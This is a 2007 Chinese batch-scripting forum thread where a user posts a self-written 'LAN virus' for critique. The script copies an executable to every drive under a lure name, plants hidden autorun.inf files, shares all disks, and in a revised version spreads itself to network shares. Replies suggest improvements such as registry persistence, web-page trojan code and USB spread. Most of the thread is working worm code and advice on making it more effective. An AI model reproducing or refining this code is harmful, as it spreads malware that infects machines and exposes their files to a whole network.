中国DOS联盟论坛

中国DOS联盟

-- 联合DOS 推动DOS 发展DOS --
联盟域名:www.cn-dos.net 论坛域名:www.cn-dos.net/forum
游客 | 登录 | 注册 | 会员 | 搜索 | 中国DOS联盟
中国DOS联盟论坛
现在时间是 2026-08-04 05:40
48,038 主题排行 / 350,123 发帖 / 今日 0 篇 / 48,251 会员排行
DOS批处理 & 脚本技术(批处理室) » [原创]菜鸟刚编的局域网病毒,请大家指教
可打印版本  1,271 / 13
第1楼 jshysq 发表于 2007-04-13 22:05
新手上路 发帖 4 积分 10
[原创]菜鸟刚编的局域网病毒,请大家指教
@echo off
dir > 365.txt
find "的目录" 365.txt >linshi.txt
for /f "skip=2 tokens=1 delims=\ " %%a in (linshi.txt) do explorer %%a
del 365.txt & del linshi.txt
::先根据用户操作打开相应磁盘
for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do copy /y icefire.exe %%k:
::复制本身到所有磁盘
for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do copy /y icefire.exe %%k:\姻缘测试.exe
::复制诱惑文件到所有磁盘
for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do echo [AutoRun]>>%%k:\autorun.inf
for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do echo shell\open\command=icefire.exe>>%%k:\autorun.inf
for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do echo shell\open=打开(^&O)>>%%k:\autorun.inf
::以上三条为写自运行autorun.inf到所有磁盘
for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do attrib +s +h +r %%k:\autorun.inf
for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do attrib +s +h +r %%k:\icefire.exe
::隐藏自运行autorun.inf和病毒文件本体
for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do net share %%k=%%k:
::共享所有磁盘

::实现本地计算机所有磁盘完全共享
::本程序为自己编写,有一定的危害。本身程序运行有可能会被卡巴所杀。请勿用于不正当用途
::请大家多指教啊
第2楼 htysm 发表于 2007-04-13 23:07
高级用户 发帖 415 积分 866
这个代码执行效率不高。完全可以再精简。
第3楼 jshysq 发表于 2007-04-13 23:17
新手上路 发帖 4 积分 10
时刻关注中……

发现个问题,就是当用户在直接运行局域网其他机器上的程序时,不能把程序自身复制到用户本身磁盘。真郁闷,不知道怎么实现在其他机器直接运行能复制到本地磁盘。请教高手啊%……
第4楼 fanglor 发表于 2007-04-14 05:02
初级用户 发帖 30 积分 68
只实现了自我复制和触发机制,并没有向其它机子传播啊?

我也曾构思过,也是AUTORUN.INF.不过我是用U盘作为载体. 这样只要是用过我U盘

的人.都在可能中哦.前提是要开了自动运行哈!
第5楼 benteng302 发表于 2007-04-15 00:02
初级用户 发帖 41 积分 88
不怎么样。
第6楼 lxmxn 发表于 2007-04-15 00:12
版主 发帖 4,938 积分 11,386
为什么不把这些for都合并呢?
第7楼 jshysq 发表于 2007-04-15 00:51
新手上路 发帖 4 积分 10
修改过的实现局域网扩散。大家帮我看看哦
@echo off
dir > 365.txt
find "的目录" 365.txt >linshi.txt
for /f "skip=2 tokens=1 delims=\ " %%a in (linshi.txt) do explorer %%a
del 365.txt & del linshi.txt
::打开相应目录
for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do net share %%k=%%k:
::开启本地磁盘共享

net view|find "\\" >>netview.txt
for /f "" %%a in (netview.txt) do (
del share.txt
net view %%a|find "Disk" >>share.txt
::取局域网共享目录
for /f "tokens=1" %%i in (share.txt) do (
copy /y icefire.exe %%a\%%i
::复制本身到局域网的共享目录里
copy /y icefire.exe %%a\%%i\缘分测试.exe
::复制为缘分测试.exe
attrib -s -h -r %%a\%%i\autorun.inf
del %%a\%%i\autorun.inf
::删除原有inf文件(主要怕原来有autorun.inf文件导致不能往里写)
echo >>%%a\%%i\autorun.inf
echo shell\open\command=icefire.exe>>%%a\%%i\autorun.inf
::写自启动文件autorun.inf到局域网共享目录
attrib +s +h +r %%a\%%i\autorun.inf
attrib +s +h +r %%a\%%i\icefire.exe
::隐藏autorun.inf和病毒体本身
)
)
del share.txt && del netview.txt


实现局域网相同工作组共享的感染和移动硬盘的感染

[ Last edited by jshysq on 2007-4-14 at 06:04 PM ]
第8楼 nicesoft 发表于 2007-04-15 01:55
初级用户 发帖 47 积分 98
不明白哦
第9楼 jackson313 发表于 2007-04-15 14:38
初级用户 发帖 26 积分 48
谢谢分享,收藏了
第10楼 bza2006 发表于 2007-04-16 01:07
初级用户 发帖 27 积分 58
免疫过的autorun.inf不是那么简单删除的
写入的autorun.inf语句已经过时了
应该再加上asp,htm挂马代码
还有就是运行后有cmd.exe,很容易被结束进程的
第11楼 bjsh 发表于 2007-04-16 01:19
银牌会员 发帖 621 积分 2,000
看到挂马两个字就来气。
第12楼 jshysq 发表于 2007-04-18 21:56
新手上路 发帖 4 积分 10
呵呵,其实还可以再实现很多功能的。
本来还可以挂个QQ的尾巴的
不过我想这东西不能写的太绝吧~呵呵

[ Last edited by jshysq on 2007-4-18 at 08:58 AM ]
第13楼 zhoushijay 发表于 2007-04-19 06:33
高级用户 发帖 375 积分 845
楼主不防加个reg文件,在注册表启动项里添加一个值,这样只要对方运行过一次麻烦就大了

Windows Registry Editor Version 5.00

"*.exe"="c\...\*.exe"

[ Last edited by zhoushijay on 2007-4-18 at 05:45 PM ]
第14楼 flyinspace 发表于 2007-04-19 09:17
银牌会员 发帖 517 积分 1,206
用批处理,还不如用vbs写呢。
[ 联系联盟系统管理团队 - 中国DOS联盟 - 标准版 ]
Sponsored by ifanr Inc | © 2001–2023